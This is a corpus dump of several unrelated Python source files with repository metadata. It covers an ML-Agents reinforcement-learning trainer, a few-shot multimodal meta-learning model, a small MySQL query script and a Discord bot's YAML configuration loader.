'Fail to generate block with a descriptor missing a private key')
child_descriptor = 'pkh(tpubD6NzVbkrYhZ4XgiXtGrdW5XDAPFCL9h7we1vwNCpn8tGbBcgfVYjXyhWo4E1xkh56hjod1RhGjxbaTLV3X4FyWuejifB9jusQ46QzG87VKp/0\'/0)'
assert_raises_rpc_error(-5,
'Cannot derive script without private keys',
node.generateblock,
child_descriptor,
[])
if __name__ == '__main__':
GenerateBlockTest().main()
| 44.469388
| 152
| 0.59844
|
9765ab17be01169bec4312e6532afb80c5ad5807
| 10,118
|
py
|
Python
|
ml-agents/mlagents/trainers/trainer/rl_trainer.py
|
wjsghtjf/AI_SOOLZARI
|
65c05e073f7673ddec708b9e6eb58fede4d0eb5c
|
[
"Apache-2.0"
] | 1
|
2021-03-31T02:36:47.000Z
|
2021-03-31T02:36:47.000Z
|
ml-agents/mlagents/trainers/trainer/rl_trainer.py
|
wjsghtjf/AI_SOOLZARI
|
65c05e073f7673ddec708b9e6eb58fede4d0eb5c
|
[
"Apache-2.0"
] | null | null | null |
ml-agents/mlagents/trainers/trainer/rl_trainer.py
|
wjsghtjf/AI_SOOLZARI
|
65c05e073f7673ddec708b9e6eb58fede4d0eb5c
|
[
"Apache-2.0"
] | 1
|
2020-08-24T11:02:57.000Z
|
2020-08-24T11:02:57.000Z
|
# # Unity ML-Agents Toolkit
import os
from typing import Dict, List, Optional
from collections import defaultdict
import abc
import time
import attr
from mlagents.model_serialization import SerializationSettings, copy_model_files
from mlagents.trainers.policy.checkpoint_manager import (
NNCheckpoint,
NNCheckpointManager,
)
from mlagents_envs.logging_util import get_logger
from mlagents_envs.timers import timed
from mlagents.trainers.optimizer import Optimizer
from mlagents.trainers.buffer import AgentBuffer
from mlagents.trainers.trainer import Trainer
from mlagents.trainers.components.reward_signals import RewardSignalResult
from mlagents_envs.timers import hierarchical_timer
from mlagents.trainers.agent_processor import AgentManagerQueue
from mlagents.trainers.trajectory import Trajectory
from mlagents.trainers.stats import StatsPropertyType
RewardSignalResults = Dict[str, RewardSignalResult]
logger = get_logger(__name__)
class RLTrainer(Trainer): # pylint: disable=abstract-method
"""
This class is the base class for trainers that use Reward Signals.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# collected_rewards is a dictionary from name of reward signal to a dictionary of agent_id to cumulative reward
# used for reporting only. We always want to report the environment reward to Tensorboard, regardless
# of what reward signals are actually present.
self.cumulative_returns_since_policy_update: List[float] = []
self.collected_rewards: Dict[str, Dict[str, int]] = {
"environment": defaultdict(lambda: 0)
}
self.update_buffer: AgentBuffer = AgentBuffer()
self._stats_reporter.add_property(
StatsPropertyType.HYPERPARAMETERS, self.trainer_settings.as_dict()
)
self._next_save_step = 0
self._next_summary_step = 0
def end_episode(self) -> None:
"""
A signal that the Episode has ended. The buffer must be reset.
        Gets called only when the academy resets.
"""
for rewards in self.collected_rewards.values():
for agent_id in rewards:
rewards[agent_id] = 0
def _update_end_episode_stats(self, agent_id: str, optimizer: Optimizer) -> None:
for name, rewards in self.collected_rewards.items():
if name == "environment":
self.stats_reporter.add_stat(
"Environment/Cumulative Reward", rewards.get(agent_id, 0)
)
self.cumulative_returns_since_policy_update.append(
rewards.get(agent_id, 0)
)
self.reward_buffer.appendleft(rewards.get(agent_id, 0))
rewards[agent_id] = 0
else:
self.stats_reporter.add_stat(
optimizer.reward_signals[name].stat_name, rewards.get(agent_id, 0)
)
rewards[agent_id] = 0
def _clear_update_buffer(self) -> None:
"""
Clear the buffers that have been built up during inference.
"""
self.update_buffer.reset_agent()
@abc.abstractmethod
def _is_ready_update(self):
"""
Returns whether or not the trainer has enough elements to run update model
        :return: A boolean corresponding to whether or not update_model() can be run
"""
return False
def _policy_mean_reward(self) -> Optional[float]:
""" Returns the mean episode reward for the current policy. """
rewards = self.cumulative_returns_since_policy_update
if len(rewards) == 0:
return None
else:
return sum(rewards) / len(rewards)
@timed
def _checkpoint(self) -> NNCheckpoint:
"""
Checkpoints the policy associated with this trainer.
"""
n_policies = len(self.policies.keys())
if n_policies > 1:
logger.warning(
"Trainer has multiple policies, but default behavior only saves the first."
)
policy = list(self.policies.values())[0]
model_path = policy.model_path
settings = SerializationSettings(model_path, self.brain_name)
checkpoint_path = os.path.join(model_path, f"{self.brain_name}-{self.step}")
policy.checkpoint(checkpoint_path, settings)
new_checkpoint = NNCheckpoint(
int(self.step),
f"{checkpoint_path}.nn",
self._policy_mean_reward(),
time.time(),
)
NNCheckpointManager.add_checkpoint(
self.brain_name, new_checkpoint, self.trainer_settings.keep_checkpoints
)
return new_checkpoint
def save_model(self) -> None:
"""
Saves the policy associated with this trainer.
"""
n_policies = len(self.policies.keys())
if n_policies > 1:
logger.warning(
"Trainer has multiple policies, but default behavior only saves the first."
)
policy = list(self.policies.values())[0]
model_checkpoint = self._checkpoint()
# Copy the checkpointed model files to the final output location
copy_model_files(model_checkpoint.file_path, f"{policy.model_path}.nn")
final_checkpoint = attr.evolve(
model_checkpoint, file_path=f"{policy.model_path}.nn"
)
NNCheckpointManager.track_final_checkpoint(self.brain_name, final_checkpoint)
@abc.abstractmethod
def _update_policy(self) -> bool:
"""
Uses demonstration_buffer to update model.
:return: Whether or not the policy was updated.
"""
pass
def _increment_step(self, n_steps: int, name_behavior_id: str) -> None:
"""
Increment the step count of the trainer
:param n_steps: number of steps to increment the step count by
"""
self.step += n_steps
self._next_summary_step = self._get_next_interval_step(self.summary_freq)
self._next_save_step = self._get_next_interval_step(
self.trainer_settings.checkpoint_interval
)
p = self.get_policy(name_behavior_id)
if p:
p.increment_step(n_steps)
def _get_next_interval_step(self, interval: int) -> int:
"""
Get the next step count that should result in an action.
:param interval: The interval between actions.
"""
return self.step + (interval - self.step % interval)
def _write_summary(self, step: int) -> None:
"""
Saves training statistics to Tensorboard.
"""
self.stats_reporter.add_stat("Is Training", float(self.should_still_train))
self.stats_reporter.write_stats(int(step))
@abc.abstractmethod
def _process_trajectory(self, trajectory: Trajectory) -> None:
"""
Takes a trajectory and processes it, putting it into the update buffer.
:param trajectory: The Trajectory tuple containing the steps to be processed.
"""
self._maybe_write_summary(self.get_step + len(trajectory.steps))
self._maybe_save_model(self.get_step + len(trajectory.steps))
self._increment_step(len(trajectory.steps), trajectory.behavior_id)
def _maybe_write_summary(self, step_after_process: int) -> None:
"""
If processing the trajectory will make the step exceed the next summary write,
write the summary. This logic ensures summaries are written on the update step and not in between.
:param step_after_process: the step count after processing the next trajectory.
"""
if self._next_summary_step == 0: # Don't write out the first one
self._next_summary_step = self._get_next_interval_step(self.summary_freq)
if step_after_process >= self._next_summary_step and self.get_step != 0:
self._write_summary(self._next_summary_step)
def _maybe_save_model(self, step_after_process: int) -> None:
"""
If processing the trajectory will make the step exceed the next model write,
save the model. This logic ensures models are written on the update step and not in between.
:param step_after_process: the step count after processing the next trajectory.
"""
if self._next_save_step == 0: # Don't save the first one
self._next_save_step = self._get_next_interval_step(
self.trainer_settings.checkpoint_interval
)
if step_after_process >= self._next_save_step and self.get_step != 0:
self._checkpoint()
def advance(self) -> None:
"""
Steps the trainer, taking in trajectories and updates if ready.
Will block and wait briefly if there are no trajectories.
"""
with hierarchical_timer("process_trajectory"):
for traj_queue in self.trajectory_queues:
# We grab at most the maximum length of the queue.
# This ensures that even if the queue is being filled faster than it is
# being emptied, the trajectories in the queue are on-policy.
_queried = False
for _ in range(traj_queue.qsize()):
_queried = True
try:
t = traj_queue.get_nowait()
self._process_trajectory(t)
except AgentManagerQueue.Empty:
break
if self.threaded and not _queried:
# Yield thread to avoid busy-waiting
time.sleep(0.0001)
if self.should_still_train:
if self._is_ready_update():
with hierarchical_timer("_update_policy"):
if self._update_policy():
for q in self.policy_queues:
# Get policies that correspond to the policy queue in question
q.put(self.get_policy(q.behavior_id))
else:
self._clear_update_buffer()
| 41.467213
| 119
| 0.642024
|
8a0013f3c3b1a0bbdbf50c9623759aa62293574b
| 12,338
|
py
|
Python
|
multifew/models/fumi.py
|
s-a-malik/multi-few
|
7f7d05e51ee7630026153c4a8a7c363827418735
|
[
"MIT"
] | 1
|
2021-06-02T09:10:26.000Z
|
2021-06-02T09:10:26.000Z
|
multifew/models/fumi.py
|
s-a-malik/multi-few
|
7f7d05e51ee7630026153c4a8a7c363827418735
|
[
"MIT"
] | 11
|
2021-12-12T00:15:26.000Z
|
2022-03-30T15:44:04.000Z
|
multifew/models/fumi.py
|
s-a-malik/multi-few
|
7f7d05e51ee7630026153c4a8a7c363827418735
|
[
"MIT"
] | null | null | null |
import wandb
import torch
import torch.nn as nn
import torch.nn.functional as F
from tqdm import tqdm
from collections import OrderedDict
from transformers import BertModel
from torchmeta.modules import MetaModule, MetaSequential, MetaLinear
from torchmeta.utils.gradient_based import gradient_update_parameters
from ..utils.average_meter import AverageMeter
from ..utils import utils as utils
from .common import WordEmbedding
class FUMI(nn.Module):
def __init__(self,
n_way=5,
im_emb_dim=2048,
im_hid_dim=32,
text_encoder="BERT",
text_emb_dim=300,
text_hid_dim=1024,
dictionary=None,
pooling_strat="mean",
shared_feats=True):
super(FUMI, self).__init__()
self.n_way = n_way
self.im_emb_dim = im_emb_dim
self.im_hid_dim = im_hid_dim
self.text_encoder_type = text_encoder
self.text_emb_dim = text_emb_dim # only applicable if precomputed
self.text_hid_dim = text_hid_dim
self.dictionary = dictionary # for word embeddings
self.pooling_strat = pooling_strat
if self.text_encoder_type == "BERT":
self.text_encoder = BertModel.from_pretrained('bert-base-uncased')
self.text_emb_dim = self.text_encoder.config.hidden_size
elif self.text_encoder_type == "precomputed":
self.text_encoder = nn.Identity()
elif self.text_encoder_type == "w2v" or self.text_encoder_type == "glove":
# load pretrained word embeddings as weights
self.text_encoder = WordEmbedding(self.text_encoder_type,
self.pooling_strat,
self.dictionary)
self.text_emb_dim = self.text_encoder.embedding_dim
elif self.text_encoder_type == "rand":
self.text_encoder = nn.Linear(self.text_emb_dim, self.text_emb_dim)
else:
raise NameError(f"{text_encoder} not allowed as text encoder")
for param in self.text_encoder.parameters():
param.requires_grad = False
self.shared_feats = shared_feats
if self.shared_feats:
# Text embedding to image parameters
self.net = nn.Sequential(
nn.Linear(self.text_emb_dim, self.text_hid_dim),
nn.ReLU(),
nn.Linear(
self.text_hid_dim,
self.im_hid_dim # Weights
+ 1) # Biases
)
# Bit of a hack to copy torch default weight initialisation
self.first = nn.Linear(
1,
self.im_hid_dim * self.im_emb_dim # Weights
+ self.im_hid_dim, # Biases
bias=False)
else:
# Text embedding to image parameters
self.net = nn.Sequential(
nn.Linear(self.text_emb_dim, self.text_hid_dim),
nn.ReLU(),
nn.Linear(
self.text_hid_dim,
self.im_hid_dim * (self.im_emb_dim + 1) # Weights
+ self.im_hid_dim + 1) # Biases
)
def forward(self, text_embed, device):
im_params = self.net(text_embed)
if self.shared_feats:
shared_params = self.first(torch.ones(1).to(device))
bias_len = self.im_hid_dim + 1
out = torch.empty(
len(text_embed),
self.im_hid_dim * (self.im_emb_dim + 1) + self.im_hid_dim +
1).to(device)
out[:, :bias_len - 1] = shared_params[:bias_len - 1]
out[:, bias_len - 1] = im_params[:, 0]
out[:, bias_len:-self.im_hid_dim] = shared_params[bias_len - 1:]
out[:, -self.im_hid_dim:] = im_params[:, 1:]
return out
return im_params
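    # Layout sketch (derived from the indexing above and in im_forward, for reference only):
    # each row of the returned tensor packs, in order,
    #   [hidden biases (im_hid_dim), output bias (1),
    #    hidden weights (im_hid_dim * im_emb_dim), output weights (im_hid_dim)],
    # i.e. bias_len = im_hid_dim + 1 bias entries first, then the flattened
    # (im_emb_dim + 1) x im_hid_dim weight matrix that im_forward reshapes and applies.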
def evaluate(self, args, batch, optimizer, task="train"):
"""
Evaluate batch on model
        Returns:
        - outer_loss: outer loop loss
        - acc: accuracy on query set
        - test_preds: predicted labels on the query set
        - test_targets: ground-truth labels on the query set
        """
if task == "train":
self.train()
self.zero_grad()
else:
self.eval()
# Support set
train_inputs, train_targets = batch['train']
train_inputs = [x.to(args.device) for x in train_inputs]
# train_inputs = train_inputs[3].to(device=args.device)
train_targets = train_targets.to(device=args.device)
# Query set
test_inputs, test_targets = batch['test']
test_inputs = [x.to(args.device) for x in test_inputs]
# test_inputs = test_inputs[3].to(device=args.device)
test_targets = test_targets.to(device=args.device)
test_preds = torch.zeros(test_targets.shape).to(device=args.device)
# Unpack input
if self.text_encoder_type == "BERT":
_, train_texts, train_attn_masks, train_imss = train_inputs
_, test_texts, test_attn_masks, test_imss = test_inputs
else:
_, train_texts, train_imss = train_inputs
_, test_texts, test_imss = test_inputs
outer_loss = torch.tensor(0., device=args.device)
accuracy = torch.tensor(0., device=args.device)
for task_idx, (train_target, test_target) in enumerate(
zip(train_targets, test_targets)):
n_steps = 0
if task == "train":
n_steps = args.num_train_adapt_steps
else:
n_steps = args.num_test_adapt_steps
if self.text_encoder_type == "BERT":
im_params = self.get_im_params(train_texts[task_idx],
train_target, args.device,
train_attn_masks[task_idx])
else:
im_params = self.get_im_params(train_texts[task_idx],
train_target, args.device)
for _ in range(n_steps):
train_logit = self.im_forward(train_imss[task_idx], im_params)
inner_loss = F.cross_entropy(train_logit, train_target)
grads = torch.autograd.grad(inner_loss,
im_params,
create_graph=not args.first_order)
im_params -= args.step_size * grads[0]
test_logit = self.im_forward(test_imss[task_idx], im_params)
_, test_preds[task_idx] = test_logit.max(dim=-1)
outer_loss += F.cross_entropy(test_logit, test_target)
with torch.no_grad():
accuracy += get_accuracy(test_logit, test_target)
outer_loss.div_(train_imss.shape[0])
accuracy.div_(train_imss.shape[0])
if task == "train":
optimizer.zero_grad()
outer_loss.backward()
optimizer.step()
return outer_loss.detach().cpu().numpy(), accuracy.detach().cpu(
).numpy(), test_preds, test_targets
def get_im_params(self, text, targets, device, attn_mask=None):
NK, seq_len = text.shape
if self.text_encoder_type == "BERT":
# Need to reshape batch for BERT input
bert_output = self.text_encoder(text.view(-1, seq_len),
attention_mask=attn_mask.view(
-1, seq_len))
# Get [CLS] token
text_encoding = bert_output[1].view(NK, -1) # (N*K x 768)
elif self.text_encoder_type == "rand":
# Get a random tensor as the encoding
text_encoding = 2 * torch.rand(NK, self.text_emb_dim) - 1
else:
text_encoding = self.text_encoder(text.unsqueeze(0)).squeeze()
# Transform to per-class descriptions
class_text_enc = torch.empty(self.n_way, self.text_emb_dim).to(device)
for i in range(self.n_way):
class_text_enc[i] = text_encoding[(targets == i).nonzero(
as_tuple=True)[0][0]]
return self(class_text_enc, device)
def im_forward(self, im_embeds, im_params):
bias_len = self.im_hid_dim + 1
b_im = torch.unsqueeze(im_params[:, :bias_len], 2)
w_im = im_params[:, bias_len:].view(-1, self.im_emb_dim + 1,
self.im_hid_dim)
a = torch.matmul(im_embeds, w_im[:, :-1])
h = F.relu(torch.transpose(a, 1, 2) + b_im[:, :-1])
a_out = torch.matmul(torch.transpose(h, 1, 2),
torch.unsqueeze(w_im[:, -1], 2))
out = torch.squeeze(a_out) + b_im[:, -1]
return torch.transpose(out, 0, 1)
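    # Shape sketch (illustrative, following the ops above): with im_embeds of shape
    # (n_examples, im_emb_dim) and im_params of shape (n_way, D), the hidden activation
    # h broadcasts to (n_way, im_hid_dim, n_examples) and the returned logits are
    # (n_examples, n_way), i.e. one score per class for every image embedding.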
def training_run(args, model, optimizer, train_loader, val_loader,
max_test_batches):
"""
FUMI training loop
"""
    best_loss, best_acc, _, _ = test_loop(args, model, val_loader, max_test_batches)
print(f"\ninitial loss: {best_loss}, acc: {best_acc}")
best_batch_idx = 0
try:
# Training loop
for batch_idx, batch in enumerate(train_loader):
            train_loss, train_acc, _, _ = model.evaluate(args=args,
                                                          batch=batch,
                                                          optimizer=optimizer,
                                                          task="train")
wandb.log(
{
"train/acc": train_acc,
"train/loss": train_loss,
"num_episodes": (batch_idx + 1) * args.batch_size
},
step=batch_idx)
# Eval on validation set periodically
if batch_idx % args.eval_freq == 0 and batch_idx != 0:
                val_loss, val_acc, _, _ = test_loop(args, model, val_loader,
                                                    max_test_batches)
is_best = val_loss < best_loss
if is_best:
best_loss = val_loss
best_batch_idx = batch_idx
wandb.log({
"val/acc": val_acc,
"val/loss": val_loss
},
step=batch_idx)
checkpoint_dict = {
"batch_idx": batch_idx,
"state_dict": model.state_dict(),
"best_loss": best_loss,
"optimizer": optimizer.state_dict(),
"args": vars(args)
}
utils.save_checkpoint(checkpoint_dict, is_best)
print(
f"\nBatch {batch_idx+1}/{args.epochs}: \ntrain/loss: {train_loss}, train/acc: {train_acc}"
f"\nval/loss: {val_loss}, val/acc: {val_acc}")
# break after max iters or early stopping
if (batch_idx > args.epochs - 1) or (
args.patience > 0
and batch_idx - best_batch_idx > args.patience):
break
except KeyboardInterrupt:
pass
return model
def test_loop(args, model, test_loader, max_num_batches):
"""
Evaluate model on val/test set.
    Returns:
    - avg_test_loss (float): average test loss per task
    - avg_test_acc (float): average test accuracy per task
    - test_preds: predicted labels for each evaluated batch
    - test_targets: ground-truth labels for each evaluated batch
    """
avg_test_acc = AverageMeter()
avg_test_loss = AverageMeter()
test_preds = []
test_targets = []
for batch_idx, batch in enumerate(
tqdm(test_loader, total=max_num_batches, position=0, leave=True)):
test_loss, test_acc, preds, target = model.evaluate(args=args,
batch=batch,
optimizer=None,
task="test")
avg_test_acc.update(test_acc)
avg_test_loss.update(test_loss)
test_preds.append(preds)
test_targets.append(target)
if batch_idx > max_num_batches - 1:
break
return avg_test_loss.avg, avg_test_acc.avg, test_preds, test_targets
def get_accuracy(logits, targets):
_, predictions = torch.max(logits, dim=-1)
return torch.mean(predictions.eq(targets).float())
| 39.41853
| 110
| 0.544821
|
dabd248b6e3e315aa5b0207d1a654e4ec32a9fe0
| 121
|
py
|
Python
|
girvan_newman/__init__.py
|
kindeQi/Community-Detection
|
623b5162fca9948d463ae1a1a8e24cbfc90125d3
|
[
"MIT"
] | 2
|
2019-12-24T02:27:45.000Z
|
2019-12-24T02:28:00.000Z
|
girvan_newman/__init__.py
|
kindeQi/Community-Detection
|
623b5162fca9948d463ae1a1a8e24cbfc90125d3
|
[
"MIT"
] | null | null | null |
girvan_newman/__init__.py
|
kindeQi/Community-Detection
|
623b5162fca9948d463ae1a1a8e24cbfc90125d3
|
[
"MIT"
] | null | null | null |
from girvan_newman.dataset import GNDataset
from girvan_newman.model import GNModel, GNBetweenessGraph, GNModularityGraph
| 60.5
| 77
| 0.892562
|
94647894288043c0f8ee8a671055617ae06d42bb
| 59
|
py
|
Python
|
fuzzybee/utils/constant.py
|
youtaya/knight
|
6899e18ca6b1ef01daaae7d7fd14b50a26aa0aee
|
[
"MIT"
] | null | null | null |
fuzzybee/utils/constant.py
|
youtaya/knight
|
6899e18ca6b1ef01daaae7d7fd14b50a26aa0aee
|
[
"MIT"
] | null | null | null |
fuzzybee/utils/constant.py
|
youtaya/knight
|
6899e18ca6b1ef01daaae7d7fd14b50a26aa0aee
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
GENDER = ((u'男',u'男'),(u'女',u'女'))
| 19.666667
| 34
| 0.40678
|
89076ff2730fda90ecf426d357a3512e73d20017
| 497
|
py
|
Python
|
connectDB.py
|
BiancaGedorio/Python-MySQLDatabase
|
2b7c2a95ba6492e910d86905621609dff0509789
|
[
"MIT"
] | null | null | null |
connectDB.py
|
BiancaGedorio/Python-MySQLDatabase
|
2b7c2a95ba6492e910d86905621609dff0509789
|
[
"MIT"
] | null | null | null |
connectDB.py
|
BiancaGedorio/Python-MySQLDatabase
|
2b7c2a95ba6492e910d86905621609dff0509789
|
[
"MIT"
] | null | null | null |
import mysql.connector
# connecting client and database server using mysql connector module
conn = mysql.connector.connect(host='localhost',
user='root',
password='***********',
database='database'
)
cursor = conn.cursor()
# Executing the select command. It displays all the contents in a table.
cursor.execute("Select * from customers;")
for x in cursor:
    print(x)
# Close the connection once the results have been printed
conn.close()
| 29.235294
| 72
| 0.545272
|
89504a2e0cd7ed217611b14984c731bcedc6e864
| 13,892
|
py
|
Python
|
bot/constants.py
|
atmishra/bot
|
ad1a33e80152343a81eeeabf0117ced76b83e273
|
[
"MIT"
] | null | null | null |
bot/constants.py
|
atmishra/bot
|
ad1a33e80152343a81eeeabf0117ced76b83e273
|
[
"MIT"
] | null | null | null |
bot/constants.py
|
atmishra/bot
|
ad1a33e80152343a81eeeabf0117ced76b83e273
|
[
"MIT"
] | null | null | null |
"""
Loads bot configuration from YAML files.
By default, this simply loads the default
configuration located at `config-default.yml`.
If a file called `config.yml` is found in the
project directory, the default configuration
is recursively updated with any settings from
the custom configuration. Any settings left
out of the custom user configuration will keep
their default values from `config-default.yml`.
"""
import logging
import os
from collections.abc import Mapping
from enum import Enum
from pathlib import Path
from typing import Dict, List
import yaml
log = logging.getLogger(__name__)
def _env_var_constructor(loader, node):
"""
Implements a custom YAML tag for loading optional environment
variables. If the environment variable is set, returns the
value of it. Otherwise, returns `None`.
Example usage in the YAML configuration:
# Optional app configuration. Set `MY_APP_KEY` in the environment to use it.
application:
key: !ENV 'MY_APP_KEY'
"""
default = None
# Check if the node is a plain string value
if node.id == 'scalar':
value = loader.construct_scalar(node)
key = str(value)
else:
# The node value is a list
value = loader.construct_sequence(node)
if len(value) >= 2:
# If we have at least two values, then we have both a key and a default value
default = value[1]
key = value[0]
else:
# Otherwise, we just have a key
key = value[0]
return os.getenv(key, default)
def _join_var_constructor(loader, node):
"""
Implements a custom YAML tag for concatenating other tags in
the document to strings. This allows for a much more DRY configuration
file.
"""
fields = loader.construct_sequence(node)
return "".join(str(x) for x in fields)
yaml.SafeLoader.add_constructor("!ENV", _env_var_constructor)
yaml.SafeLoader.add_constructor("!JOIN", _join_var_constructor)
# Pointing old tag to !ENV constructor to avoid breaking existing configs
yaml.SafeLoader.add_constructor("!REQUIRED_ENV", _env_var_constructor)
with open("config-default.yml", encoding="UTF-8") as f:
_CONFIG_YAML = yaml.safe_load(f)
def _recursive_update(original, new):
"""
Helper method which implements a recursive `dict.update`
method, used for updating the original configuration with
configuration specified by the user.
"""
for key, value in original.items():
if key not in new:
continue
if isinstance(value, Mapping):
if not any(isinstance(subvalue, Mapping) for subvalue in value.values()):
original[key].update(new[key])
_recursive_update(original[key], new[key])
else:
original[key] = new[key]
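# Illustrative example of the merge above: with
#   original = {"bot": {"prefixes": {"guild": "!"}, "token": None}}
#   new      = {"bot": {"token": "abc"}}
# _recursive_update(original, new) leaves the nested "prefixes" mapping untouched
# and overwrites only "token".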
if Path("config.yml").exists():
log.info("Found `config.yml` file, loading constants from it.")
with open("config.yml", encoding="UTF-8") as f:
user_config = yaml.safe_load(f)
_recursive_update(_CONFIG_YAML, user_config)
def check_required_keys(keys):
"""
Verifies that keys that are set to be required are present in the
loaded configuration.
"""
for key_path in keys:
lookup = _CONFIG_YAML
try:
for key in key_path.split('.'):
lookup = lookup[key]
if lookup is None:
raise KeyError(key)
except KeyError:
log.critical(
f"A configuration for `{key_path}` is required, but was not found. "
"Please set it in `config.yml` or setup an environment variable and try again."
)
raise
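# Illustrative `config.yml` snippet (hypothetical keys) showing what the check above
# enforces -- here `bot.token` must resolve to a non-None value or startup aborts:
#
#   config:
#       required_keys:
#           - 'bot.token'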
try:
required_keys = _CONFIG_YAML['config']['required_keys']
except KeyError:
pass
else:
check_required_keys(required_keys)
class YAMLGetter(type):
"""
Implements a custom metaclass used for accessing
configuration data by simply accessing class attributes.
Supports getting configuration from up to two levels
of nested configuration through `section` and `subsection`.
`section` specifies the YAML configuration section (or "key")
in which the configuration lives, and must be set.
`subsection` is an optional attribute specifying the section
within the section from which configuration should be loaded.
Example Usage:
# config.yml
bot:
prefixes:
direct_message: ''
guild: '!'
# config.py
class Prefixes(metaclass=YAMLGetter):
section = "bot"
subsection = "prefixes"
# Usage in Python code
from config import Prefixes
def get_prefix(bot, message):
if isinstance(message.channel, PrivateChannel):
return Prefixes.direct_message
return Prefixes.guild
"""
subsection = None
def __getattr__(cls, name):
name = name.lower()
try:
if cls.subsection is not None:
return _CONFIG_YAML[cls.section][cls.subsection][name]
return _CONFIG_YAML[cls.section][name]
except KeyError:
dotted_path = '.'.join(
(cls.section, cls.subsection, name)
if cls.subsection is not None else (cls.section, name)
)
log.critical(f"Tried accessing configuration variable at `{dotted_path}`, but it could not be found.")
raise
def __getitem__(cls, name):
return cls.__getattr__(name)
# Dataclasses
class Bot(metaclass=YAMLGetter):
section = "bot"
prefix: str
token: str
class Filter(metaclass=YAMLGetter):
section = "filter"
filter_zalgo: bool
filter_invites: bool
filter_domains: bool
watch_rich_embeds: bool
watch_words: bool
watch_tokens: bool
# Notifications are not expected for "watchlist" type filters
notify_user_zalgo: bool
notify_user_invites: bool
notify_user_domains: bool
ping_everyone: bool
guild_invite_whitelist: List[int]
domain_blacklist: List[str]
word_watchlist: List[str]
token_watchlist: List[str]
channel_whitelist: List[int]
role_whitelist: List[int]
class Cooldowns(metaclass=YAMLGetter):
section = "bot"
subsection = "cooldowns"
tags: int
class Colours(metaclass=YAMLGetter):
section = "style"
subsection = "colours"
soft_red: int
soft_green: int
soft_orange: int
class DuckPond(metaclass=YAMLGetter):
section = "duck_pond"
threshold: int
custom_emojis: List[int]
class Emojis(metaclass=YAMLGetter):
section = "style"
subsection = "emojis"
defcon_disabled: str # noqa: E704
defcon_enabled: str # noqa: E704
defcon_updated: str # noqa: E704
status_online: str
status_offline: str
status_idle: str
status_dnd: str
bullet: str
new: str
pencil: str
cross_mark: str
ducky_yellow: int
ducky_blurple: int
ducky_regal: int
ducky_camo: int
ducky_ninja: int
ducky_devil: int
ducky_tube: int
upvotes: str
comments: str
user: str
class Icons(metaclass=YAMLGetter):
section = "style"
subsection = "icons"
crown_blurple: str
crown_green: str
crown_red: str
defcon_denied: str # noqa: E704
defcon_disabled: str # noqa: E704
defcon_enabled: str # noqa: E704
defcon_updated: str # noqa: E704
filtering: str
guild_update: str
hash_blurple: str
hash_green: str
hash_red: str
message_bulk_delete: str
message_delete: str
message_edit: str
sign_in: str
sign_out: str
token_removed: str
user_ban: str
user_unban: str
user_update: str
user_mute: str
user_unmute: str
user_verified: str
user_warn: str
pencil: str
remind_blurple: str
remind_green: str
remind_red: str
questionmark: str
superstarify: str
unsuperstarify: str
class CleanMessages(metaclass=YAMLGetter):
section = "bot"
subsection = "clean"
message_limit: int
class Categories(metaclass=YAMLGetter):
section = "guild"
subsection = "categories"
python_help: int
class Channels(metaclass=YAMLGetter):
section = "guild"
subsection = "channels"
admins: int
admin_spam: int
announcements: int
big_brother_logs: int
bot: int
checkpoint_test: int
defcon: int
devlog: int
devtest: int
esoteric: int
help_0: int
help_1: int
help_2: int
help_3: int
help_4: int
help_5: int
help_6: int
help_7: int
helpers: int
message_log: int
meta: int
mod_spam: int
mods: int
mod_alerts: int
modlog: int
off_topic_0: int
off_topic_1: int
off_topic_2: int
organisation: int
python: int
reddit: int
talent_pool: int
userlog: int
user_event_a: int
verification: int
class Webhooks(metaclass=YAMLGetter):
section = "guild"
subsection = "webhooks"
talent_pool: int
big_brother: int
reddit: int
duck_pond: int
class Roles(metaclass=YAMLGetter):
section = "guild"
subsection = "roles"
admin: int
announcements: int
champion: int
contributor: int
core_developer: int
helpers: int
jammer: int
moderator: int
muted: int
owner: int
partners: int
rockstars: int
team_leader: int
verified: int # This is the Developers role on PyDis, here named verified for readability reasons.
class Guild(metaclass=YAMLGetter):
section = "guild"
id: int
ignored: List[int]
staff_channels: List[int]
class Keys(metaclass=YAMLGetter):
section = "keys"
site_api: str
class URLs(metaclass=YAMLGetter):
section = "urls"
# Snekbox endpoints
snekbox_eval_api: str
# Discord API endpoints
discord_api: str
discord_invite_api: str
# Misc endpoints
bot_avatar: str
github_bot_repo: str
# Site endpoints
site: str
site_api: str
site_superstarify_api: str
site_logs_api: str
site_logs_view: str
site_reminders_api: str
site_reminders_user_api: str
site_schema: str
site_settings_api: str
site_tags_api: str
site_user_api: str
site_user_complete_api: str
site_infractions: str
site_infractions_user: str
site_infractions_type: str
site_infractions_by_id: str
site_infractions_user_type_current: str
site_infractions_user_type: str
paste_service: str
class Reddit(metaclass=YAMLGetter):
section = "reddit"
subreddits: list
class Wolfram(metaclass=YAMLGetter):
section = "wolfram"
user_limit_day: int
guild_limit_day: int
key: str
class AntiSpam(metaclass=YAMLGetter):
section = 'anti_spam'
clean_offending: bool
ping_everyone: bool
punishment: Dict[str, Dict[str, int]]
rules: Dict[str, Dict[str, int]]
class AntiMalware(metaclass=YAMLGetter):
section = "anti_malware"
whitelist: list
class BigBrother(metaclass=YAMLGetter):
section = 'big_brother'
log_delay: int
header_message_limit: int
class Free(metaclass=YAMLGetter):
section = 'free'
activity_timeout: int
cooldown_rate: int
cooldown_per: float
class Mention(metaclass=YAMLGetter):
section = 'mention'
message_timeout: int
reset_delay: int
class RedirectOutput(metaclass=YAMLGetter):
section = 'redirect_output'
delete_invocation: bool
delete_delay: int
class Event(Enum):
"""
Event names. This does not include every event (for example, raw
events aren't here), but only events used in ModLog for now.
"""
guild_channel_create = "guild_channel_create"
guild_channel_delete = "guild_channel_delete"
guild_channel_update = "guild_channel_update"
guild_role_create = "guild_role_create"
guild_role_delete = "guild_role_delete"
guild_role_update = "guild_role_update"
guild_update = "guild_update"
member_join = "member_join"
member_remove = "member_remove"
member_ban = "member_ban"
member_unban = "member_unban"
member_update = "member_update"
message_delete = "message_delete"
message_edit = "message_edit"
# Debug mode
DEBUG_MODE = True if 'local' in os.environ.get("SITE_URL", "local") else False
# Paths
BOT_DIR = os.path.dirname(__file__)
PROJECT_ROOT = os.path.abspath(os.path.join(BOT_DIR, os.pardir))
# Default role combinations
MODERATION_ROLES = Roles.moderator, Roles.admin, Roles.owner
STAFF_ROLES = Roles.helpers, Roles.moderator, Roles.admin, Roles.owner
# Roles combinations
STAFF_CHANNELS = Guild.staff_channels
# Default Channel combinations
